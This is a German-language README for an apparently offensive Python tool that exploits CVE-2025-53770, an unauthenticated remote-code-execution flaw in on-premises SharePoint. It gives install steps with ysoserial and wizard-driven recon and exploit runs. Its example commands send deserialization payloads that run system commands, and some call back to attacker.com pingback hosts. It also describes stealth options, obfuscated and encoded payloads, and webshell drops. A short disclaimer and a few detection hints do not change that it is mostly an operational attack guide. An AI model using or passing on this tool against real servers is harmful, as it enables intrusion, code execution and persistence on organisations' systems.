
Ein hochentwickeltes, assistentengesteuertes Python-Exploit-Tool, das auf CVE-2025-53770 abzielt, eine kritische (CVSS 9.8) nicht authentifizierte Remote-Codeausführungs-Sicherheitslücke (RCE) in lokalen Microsoft SharePoint Server (2016, 2019, Subscription Edition).
Divine Absolute ist ein hochentwickeltes, wizardgesteuertes Python-Exploit-Tool, das auf CVE-2025-53770 abzielt, eine kritische (CVSS 9.8) nicht authentifizierte Remote-Codeausführung (RCE) Schwachstelle in lokalen Microsoft SharePoint Server (2016, 2019, Subscription Edition). Diese Schwachstelle, die am 19. Juli 2025 als Zero-Day offengelegt wurde, beruht auf der Deserialisierung nicht vertrauenswürdiger Daten in /_layouts/15/ToolPane.aspx. Das Tool ist ausschließlich für ethische Penetrationstests und autorisierte Sicherheitsforschung konzipiert und bietet beispiellose Präzision, Heimlichkeit und Anpassungsfähigkeit für Aufklärung, Ausnutzung und Verifizierung.
Repository: https://github.com/exfil0/CVE-2025-53770
⚠️ Rechtlicher Hinweis: Dieses Tool ist nur für rechtmäßige, autorisierte Nutzung in kontrollierten Umgebungen mit ausdrücklicher Genehmigung bestimmt. Die unbefugte Verwendung gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben, ist illegal und kann schwerwiegende rechtliche Konsequenzen haben. Der Autor übernimmt keine Haftung für Missbrauch.
ToolPane.aspx mit erweiterter Bewertung und Regex (z. B. 16.0.0.\d+-\w+?).ToolPane.aspx mit robusten Umgehungen.WebRequest.Create, Dns.GetHostEntry).-enc) Payloads./xp.aspx, UUID-basiert).www.google.com), benutzerdefinierte URLs oder interne SharePoint-Pfade (z. B. /_layouts/15/sharepoint.aspx).RequestException und anpassbaren Statuscodes/Pfaden.MicrosoftSharePointTeamServices), Pfade (z. B. /versions.aspx) und Regexes./_layouts/15/ToolPane.aspx./ToolPane.aspx überwachen, WAF-Regeln verwenden (z. B. Cloudflare).pip install requests termcolor
pip install pythonnet
ysoserial.exe in einem bekannten Pfad platzieren (z. B. ./ysoserial.exe).# Ubuntu/Debian
sudo apt-get install mono-complete
# macOS (via Homebrew)
brew install mono
docker pull mcr.microsoft.com/sharepoint/server:2019
git clone https://github.com/exfil0/CVE-2025-53770.git
cd CVE-2025-53770
pip install -r requirements.txt
ysoserial.exe zugänglich ist oder den Pfad während der Ausführung angeben.Führen Sie den interaktiven Assistenten aus:
python divine_absolute.py
Recon: Scannt nach SharePoint-Präsenz und Version.Exploit: Sendet Payload an ToolPane.aspx.Full: Recon + Exploit (optionaler aggressiver Modus).https://sharepoint.example.com).ObjectDataProvider) und Befehl (z. B. cmd /c whoami) angeben.http://attacker.com/callback oder sub.attacker.com).NONE, BASIC_REFLECTION, CONCAT_OBFUSCATED oder benutzerdefiniertes Snippet wählen.NONE, FIXED (z. B. /xp.aspx), RANDOM (UUID-basiert).DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL.http://127.0.0.1:8080)./sitepages/result.txt), Regexes (z. B. Xanthorox.*), Statuscodes (z. B. 200,403), Versuche, Verzögerung und Timeout angeben.python divine_absolute.py
# Wählen: Mode=Recon, Target=https://sharepoint.example.com
python divine_absolute.py
# Wählen: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
# ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
# Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
python divine_absolute.py
# Wählen: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
# Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
python divine_absolute.py
# Wählen: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
Ergebnisse werden in xanthorox_results.json gespeichert mit den Feldern:
target: Getestete URL.sharepoint_detected: Boolean.toolpane_accessible: Boolean.exploited: Boolean (Payload gesendet).verified_rce: Boolean/None (RCE bestätigt).error: Aufgetretene Fehler.Beispiel:
[
{
"target": "https://sharepoint.example.com",
"sharepoint_detected": true,
"toolpane_accessible": true,
"exploited": true,
"verified_rce": true,
"error": null
}
]